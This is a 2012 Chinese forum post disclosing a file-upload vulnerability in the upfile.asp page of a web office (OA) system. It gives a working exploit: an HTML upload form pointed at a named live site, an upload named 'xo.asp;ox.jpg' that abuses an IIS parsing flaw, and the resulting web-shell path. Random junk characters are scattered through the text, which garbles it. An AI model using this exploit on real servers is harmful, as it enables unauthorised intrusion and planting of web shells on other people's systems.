全能OA办公系统 上传漏洞* f4 R) r8 K& w+ s! j. X! Z1 A
7 j$ s4 Z# ^: i; w
系统介绍:
0 y& Z% j0 h* i7 D6 T. }3 t5 i' D2 i, u) Z
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。; q& d% h I7 k1 p9 ?( C9 C
) ]/ U, @8 y+ J0 R主要功能:$ `: J) b% w `; T' ?/ o; ^
公司通告 ]1 }) ?* c/ l) b% F
工作计划 " a- x/ V U4 x* d9 `: }
通讯助理 / j6 d& Y% L0 I8 t$ d+ m0 t
客户资源 # t& A, T8 C1 }+ g1 f4 k6 e
我的公文 5 O) @- w e* l' x) w5 g
公文传阅 1 j* @) i6 Q* Y
公共资源
/ ^8 _8 j" N% L3 o, Z# f资源预约
Y: c$ X; @% n0 {# U* \今日考勤 ! k x' {- t9 _" Y; W8 F; W
个人计划
1 L2 Q7 `, W$ v6 `) V个人通讯录
$ S$ M6 R3 Y& O8 Z9 [个人基本档案 4 M7 X2 u; v1 B+ a, g9 P
未读邮件 3 v: i9 f1 [! c3 O0 Y3 a
发邮件 1 z' V; l% {3 ~$ ]) A5 m5 p
收件夹
+ S! s" W: n* X! S; S! ^寄件夹
# N4 k3 A: f* m! m: l! i网络硬盘
3 b0 Q6 Q }7 H5 O$ r. U网络会议
7 O2 F& e4 |: I7 C& _$ x网络调查 9 T7 r7 ^+ T8 @3 c2 g* v
交流论坛3 X2 v4 m/ j% U p
5 B/ g; F! H) H; F" G) |3 P. H, f有兴趣测试的朋友可以下源码看看- }$ C: w' d6 S! J
5 N! x; X z- x
源码下载:" L* q4 r1 ~ f8 X# T0 U, Q; s: D
5 A8 j4 }8 @# p r) m N& J! yhttp://www.mycodes.net/30/4750.htm
# L; t C/ R" d4 J. \ F* D/ e5 ]7 y& g( X1 Z# V6 q$ L
漏洞介绍:
# H: ?0 x" S; }& B9 {+ p- q0 I h! e3 s. b
由upfile.asp上传文件漏洞引起) H* W9 T9 ^% z( _
) E) S1 Y* z n4 R1 D
测试方法:# {" Z2 c7 p/ U9 T3 y, p, H- M
+ F; b& D7 C. w3 S; E) O使用名小子上传http://www.itlynn.com/upfile.asp即可
& n7 i! F' }$ h, R" q- ^2 h# |9 f0 K
如果upfile.asp文件被删除不存在。% G' t6 a6 T* ?1 M7 ]- h# J( O
3 P$ @% s# r! [0 }5 R
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。0 K$ X( j! i7 a2 R' v4 C& Q
6 c; f9 y' ]: s6 m$ X0 @; A如果存在那么将如下代码保存为upfile.html。* p$ O4 |. S' u$ t* s+ _
6 ]6 Z. M4 C- B7 j
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
t9 u4 Q* r3 N
$ T# Q2 D* Y! b( m
9 ]% P \) E2 \: c7 }6 E
/ ~& C% m; f7 f( B( A/ m01 <table border='0' align="center" cellpadding="5"> ! F3 H+ K3 [$ u( g! L* x+ T
. n0 ~2 B# J7 y: u! r) B* A5 Z, B7 C02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
) t( T @' k ~' s# D
1 L5 {3 L4 z- R5 k- V' P03 <tr>
3 V( V, b" ]9 {( M* \/ P5 ^3 Y* o3 H: F0 Y L: h E; U" W
04 <td>报错:</td>
) u. M U$ y) p% O
$ F; d* B# u4 M05 <td><input type='radio' name='errnumber' value='0'>
, G0 f( J9 u% z3 U" `. N/ b$ ?$ i
2 d/ @0 ?# h, h2 w- e5 T# E06 自动更名
! E$ {( [1 A8 Q! f9 I: u q' e. `5 @8 X- \5 c! C4 J" K
07 <input type='radio' name='errnumber' value='1' checked>
6 R4 n3 |6 R: ?% V+ ~4 e: f; i& M4 ~
8 h7 h7 ?$ } b ~' [! ?08 报错方式
3 W4 h6 V& N# k# X+ w+ s; z# U6 C& g: j, L+ X7 J
09 <input type='radio' name='errnumber' value='2'> 3 z! O* U. l+ |# C; e/ B3 [7 _
- r8 M$ D6 h" Z. O
10 直接覆盖</td>
3 o# X. c+ v8 x6 u9 C! |$ V
) O' \% \! O. {4 o6 T8 w: i' j, ?11 </tr> 2 i# s+ G& w2 o& P D
* N' g1 Z) k8 u12 <tr> + t4 P# |7 I" Z# p! B2 u0 o" t
$ q$ @+ r' T; i5 S; N) [13 <td>主题:</td> 4 e' ]8 I. K( w7 Y3 }- t" A
7 \$ e: c+ n$ R
14 <td><input type='text' name='filename' size='30'></td>
& l1 m' j0 E1 ^+ X& O! U) m
7 u) ]- z z- @% m15 </tr> + |- e8 @. ]- z1 o" x' N$ B
' {) ~4 P l$ I" [+ v16 <tr>
# u# e p) b3 H) J/ c' Y$ c# m$ I0 c: g' q: d* q+ j) {
17 <td>文件:</td> / \7 g: y8 ~ x6 t3 w* S4 L O& ^
: T" i& E! l6 p" B7 h; b18 <td><input type="file"name="fruit"size="30"></td> 3 c& g" e u% M. O+ a# G4 r
2 Q3 [ M0 J n% k. I/ d- J
19 </tr> / \) v! w) C+ {- ?4 K
T9 Z. O9 u) @" g* i/ Y
20 <tr> 9 f3 x9 ^8 n) U7 L+ a( X! w: {$ y
+ Q$ L' y! t9 h; s# h- s5 v21 <td valign='top'>简介:</td>
& }& V- p9 {6 g M, i* y. Z# w: ^
% `0 d' N8 Z6 _# L6 s, w3 ?$ S! g/ n+ x% A22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> / h' s+ z8 @9 \( Q" Z! k8 x8 ~; h
, [: c1 x) v E% Q
23 </tr>
! B0 w$ F: F" T8 n0 d& W; Z. o Q
( T7 O1 u7 Z" v% j/ l24 # o4 A& R4 w! K( b
' g* w3 @/ M9 F: U25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
# d) G7 A' L0 ]: |3 c; l, D. {
0 ], v- n8 c1 o1 B26 </tr> 1 K0 _0 k( y2 e- Z
" n+ c0 j. P5 w8 _. u+ i
27 </form> % w$ M( U2 y: j$ H3 U: o, j, d& z
( j. E6 s) @* X6 F然后打开上传一个文件名为xo.asp;ox.jpg的文件。' g4 U1 o0 z) _( B1 N L/ X! v
" L4 I/ U! ~1 a # b( v" d$ @# C8 `
& y U- _5 n9 f4 E' B上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
6 R* r0 Y1 H! h' e% N! m# Q, x
4 o2 h" V% T/ |6 p0 t, S. V4 m3 I' C* J此漏洞需要配合解析漏洞利用。1 O6 `; E' Q- T4 w! O+ g
! k1 Y& b3 E; Y3 B
|
发表于 2012-11-21 13:45:12
收藏
支持
反对